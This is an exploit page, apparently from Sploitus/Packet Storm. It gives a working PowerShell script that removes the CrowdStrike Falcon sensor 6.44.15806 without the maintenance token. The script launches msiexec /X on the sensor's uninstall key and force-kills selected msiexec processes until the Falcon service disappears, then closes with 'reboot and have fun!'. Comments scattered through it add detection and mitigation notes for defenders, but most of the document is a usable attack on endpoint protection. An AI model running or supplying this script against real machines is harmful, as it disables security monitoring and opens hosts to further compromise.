## https://sploitus.com/exploit?id=PACKETSTORM:171595
# Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token   
# Date: 30/11/2022   
# Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team)   
# Vendor Homepage: https://www.crowdstrike.com/   
# Author Homepage: https://www.deda.cloud/   
# Tested On: All Windows versions   
# Version: 6.44.15806   
# CVE: Based on CVE-2022-2841; modified by Deda Cloud Purple Team members to exploit the hotfixed release. Publication of CVE-2022-44721 in progress.   
  
  
# Step 1: locate the Falcon sensor's uninstall entry.
# Enumerates every subkey of the per-machine Uninstall registry key and keeps the
# one whose DisplayName value is exactly "CrowdStrike Sensor Platform".
# Defender note: this is a read-only registry enumeration; on its own it is
# indistinguishable from ordinary software-inventory queries.
$InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"  
  
foreach($obj in $InstalledSoftware){  
if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))  
{  
# $obj.Name is the full key path; element 6 of the backslash split is the subkey
# name directly under ...\Uninstall. It is later passed to "msiexec /X".
# If no entry matches, $uninstall_uuid is never assigned.
$uninstall_uuid = $obj.Name.Split("\")[6]  
}  
}  
  
# Step 2: start the sensor's MSI uninstall.
# $g_msiexec_instances records the PIDs of msiexec processes seen by the
# polling loop that follows, in the order they are first observed.
$g_msiexec_instances = New-Object System.Collections.ArrayList  
  
Write-Host "[+] Identified installed Falcon: $uninstall_uuid"  
Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."  
# Launches "msiexec /X<uninstall key name>" without waiting for it to finish.
# Per the header, no installation (maintenance) token is supplied.
# Detection: process-creation logging with command lines records an msiexec /X
# invocation that names the sensor's uninstall key; outside an approved
# maintenance window, and with an interactive script as parent, that is worth
# alerting on.
Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"  
  
# Step 3: poll until the CSFalconService process is gone.
# The loop has no delay between iterations apart from the 100 ms sleep inside
# the kill branch, so it polls the process list continuously.
# Detection: the observable sequence is (a) several msiexec.exe processes
# appearing after the /X launch, (b) forced termination of one or two of them
# by the script's host process, and (c) the CSFalconService process no longer
# running. Correlating process-termination telemetry with sensor heartbeat loss
# covers (b) and (c).
# Mitigation: the header ties this to CVE-2022-2841 and the pending
# CVE-2022-44721 on sensor 6.44.15806; consult the vendor advisories for those
# CVEs for fixed sensor versions -- none is stated on this page.
while($true)  
{  
# Get-Process returns nothing when no process has this name, which selects the else branch.
if (get-process -Name "CSFalconService") {  
Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {  
  
# Only PIDs not seen before are recorded, so each msiexec instance is counted once.
if (-Not $g_msiexec_instances.contains($_.id)){  
$g_msiexec_instances.Add($_.id)  
# The counts 4 and 5 are hard-coded by the authors; the page does not explain
# why the fourth and fifth observed instances are the ones selected.
if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){  
Start-Sleep -Milliseconds 100  
Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]  
# Index -1 is the most recently recorded PID; -Force terminates it without prompting.
stop-process -Force -Id $g_msiexec_instances[-1]   
}  
  
}  
  
}  
} else {   
# Exit condition: the sensor service process is no longer listed.
Write-Host "[+] CSFalconService process vanished...reboot and have fun!"  
break  
}  
}